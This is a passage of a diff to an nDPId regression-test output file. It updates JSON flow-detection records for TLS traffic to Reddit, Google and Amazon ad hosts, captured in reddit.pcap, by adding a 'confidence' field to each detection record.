 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1208,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1605291686327,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291686327,"pkt":"qtsDr8lk5EKm5WPyht1gDu9XACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3RIBuyQ3ML5BwRVmgBAB+wbmAAABAQgKqXTnC8LXOag="}
-00924{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1211,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686301,"flow_last_seen":1605291686327,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291686327,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"b.thumbs.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00980{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1398,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686301,"flow_last_seen":1605291686419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1605291686419,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"b.thumbs.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-01285{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1406,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686301,"flow_last_seen":1605291686420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"ts_msec":1605291686420,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"b.thumbs.redditmedia.com","server_names":"*.thumbs.redditmedia.com,thumbs.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.thumbs.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"FF:F4:6C:CF:D6:FD:64:3E:50:17:A2:DE:B0:F2:B6:9B:76:59:C6:75"}}
+00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1211,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686301,"flow_last_seen":1605291686327,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291686327,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"b.thumbs.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01006{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1398,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686301,"flow_last_seen":1605291686419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1605291686419,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"b.thumbs.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01311{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1406,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686301,"flow_last_seen":1605291686420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"ts_msec":1605291686420,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"b.thumbs.redditmedia.com","server_names":"*.thumbs.redditmedia.com,thumbs.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.thumbs.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"FF:F4:6C:CF:D6:FD:64:3E:50:17:A2:DE:B0:F2:B6:9B:76:59:C6:75"}}
 00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1925,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686985,"flow_last_seen":1605291686985,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605291686985,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1925,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1605291686985,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291686985,"pkt":"qtsDr8lk5EKm5WPyht1gAMi0ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACACxxABu7duD88AAAAAoAL9IJsfAAACBAWgBAIIClRf4AwAAAAAAQMDBw=="}
 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1926,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686985,"flow_last_seen":1605291686985,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605291686985,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -152,73 +152,73 @@
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1927,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1605291686996,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291686996,"pkt":"qtsDr8lk5EKm5WPyht1gCh2fACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABoU7O2lbABu20FmjEAAAAAoAL9ILJdAAACBAWgBAIICnOjJUYAAAAAAQMDBw=="}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1928,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1605291687016,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291687016,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgFAAAAAAAAIAIqAcsBIEmLB5kd7IUo3\/YpAbvHENPm6q63bg\/QoBJXgIMUAAACBAV4AQMDAwQCCArC1zxZVF\/gDA=="}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1929,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1605291687016,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291687016,"pkt":"qtsDr8lk5EKm5WPyht1gAMi0ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACACxxABu7duD9DT5uqvgBAB+wcHAAABAQgKVF\/gK8LXPFk="}
-00936{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1930,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686985,"flow_last_seen":1605291687016,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291687016,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.googletagservices.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1930,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686985,"flow_last_seen":1605291687016,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291687016,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.googletagservices.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1931,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1605291687024,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291687024,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAGhTs7YqAcsBIEmLB5kd7IUo3\/YpAbuVsAnf\/VJtBZoyoBJXgFGuAAACBAV4AQMDAwQCCArC1zxhc6MlRg=="}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1932,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1605291687024,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291687024,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAA35IcYqAcsBIEmLB5kd7IUo3\/YpAbup5BqPq4R5AeISoBJXgAGtAAACBAV4AQMDAwQCCArC1zxhS\/piSQ=="}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1933,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1605291687024,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291687024,"pkt":"qtsDr8lk5EKm5WPyht1gCh2fACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABoU7O2lbABu20FmjIJ3\/1TgBAB+9WjAAABAQgKc6MlYsLXPGE="}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1934,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1605291687024,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291687024,"pkt":"qtsDr8lk5EKm5WPyht1gDjDtACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAN+SHGqeQBu3kB4hIaj6uFgBAB+4WXAAABAQgKS\/picMLXPGE="}
-00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1935,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686996,"flow_last_seen":1605291687024,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291687024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3b6","src_port":38320,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"c.aaxads.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00917{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1936,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686985,"flow_last_seen":1605291687024,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291687024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43492,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"c.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00977{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1938,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686985,"flow_last_seen":1605291687060,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291687060,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.googletagservices.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00958{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1949,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686985,"flow_last_seen":1605291687075,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1605291687075,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43492,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"c.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00937{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1962,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686996,"flow_last_seen":1605291687096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1605291687096,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3b6","src_port":38320,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"c.aaxads.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00922{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1935,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686996,"flow_last_seen":1605291687024,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291687024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3b6","src_port":38320,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"c.aaxads.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1936,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686985,"flow_last_seen":1605291687024,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291687024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43492,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"c.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1938,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686985,"flow_last_seen":1605291687060,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291687060,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.googletagservices.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00984{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1949,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686985,"flow_last_seen":1605291687075,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1605291687075,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43492,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"c.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00963{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1962,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686996,"flow_last_seen":1605291687096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1605291687096,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3b6","src_port":38320,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"c.aaxads.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2333,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687485,"flow_last_seen":1605291687485,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605291687485,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:12c2","src_port":51026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2333,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1605291687485,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291687485,"pkt":"qtsDr8lk5EKm5WPyht1gDGJhACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACs2RLCx1IBu5\/PXZ4AAAAAoAL9IP2VAAACBAWgBAIICruOxrcAAAAAAQMDBw=="}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2341,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1605291687512,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291687512,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAKzZEsIqAcsBIEmLB5kd7IUo3\/YpAbvHUvrRnoyfz12foBJXgAjWAAACBAV4AQMDAwQCCArC1z5Fu47Gtw=="}
